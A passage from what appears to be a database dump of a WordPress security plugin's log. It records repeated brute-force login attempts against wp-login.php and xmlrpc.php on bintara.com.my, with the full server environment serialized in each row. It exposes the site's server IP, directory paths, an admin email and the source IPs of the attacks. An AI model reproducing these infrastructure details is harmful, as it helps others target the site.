rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"66.85.47.62\";s:11:\"REMOTE_PORT\";s:5:\"45354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXOyo6VIMuzgc1YVEzhJ0wAAAFQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567863459.5695\";s:12:\"REQUEST_TIME\";s:10:\"1567863459\";}}','notice','2019-09-07 13:37:41','2019-09-07 13:37:39',18257976,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'66.85.47.62'),(23689,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"48424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXPgtD1gTP0k38eCp@LzgAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567875252.6134\";s:12:\"REQUEST_TIME\";s:10:\"1567875252\";}}','notice','2019-09-07 16:54:13','2019-09-07 16:54:12',17706128,19192352,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(23690,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"48424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXPgtD1gTP0k38eCp@LzgAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567875252.6134\";s:12:\"REQUEST_TIME\";s:10:\"1567875252\";}}','notice','2019-09-07 16:54:14','2019-09-07 16:54:12',17868016,19192352,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(23691,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"49244\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXPgu05F27fNrQqE11pmVgAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567875259.6389\";s:12:\"REQUEST_TIME\";s:10:\"1567875259\";}}','notice','2019-09-07 16:54:21','2019-09-07 16:54:20',18218976,19517056,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.90.9'),(23692,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.127.83.88\";s:11:\"REMOTE_PORT\";s:5:\"59494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXP@WVl7@VXYUn795vcVhgAAAVA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567882841.1215\";s:12:\"REQUEST_TIME\";s:10:\"1567882841\";}}','notice','2019-09-07 19:00:42','2019-09-07 19:00:41',17700640,19192760,'https://bintara.com.my/wp-login.php',1,0,'13.127.83.88'),(23693,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"13.127.83.88\";s:11:\"REMOTE_PORT\";s:5:\"59964\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXP@W1l7@VXYUn795vcVigAAAVg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567882843.7775\";s:12:\"REQUEST_TIME\";s:10:\"1567882843\";}}','notice','2019-09-07 19:00:45','2019-09-07 19:00:44',18218792,19518648,'https://bintara.com.my/xmlrpc.php',1,0,'13.127.83.88'),(23726,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"47412\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXZ2kPATpeMTblrIf6HragAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568044688.799\";s:12:\"REQUEST_TIME\";s:10:\"1568044688\";}}','notice','2019-09-09 15:58:10','2019-09-09 15:58:09',17700352,19191384,'https://bintara.com.my/wp-login.php',1,0,'138.68.136.152'),(23727,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"47602\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXZ2kx2RFgzM9HvMshpfDQAAAE4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568044691.7639\";s:12:\"REQUEST_TIME\";s:10:\"1568044691\";}}','notice','2019-09-09 15:58:13','2019-09-09 15:58:12',18214728,19509904,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.136.152'),(23728,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"43588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXapLBP-OCjWSxFz-ul-lwAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568057645.0214\";s:12:\"REQUEST_TIME\";s:10:\"1568057645\";}}','notice','2019-09-09 19:34:06','2019-09-09 19:34:05',17699112,19189752,'https://bintara.com.my/wp-login.php',1,0,'68.183.173.177'),(23729,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 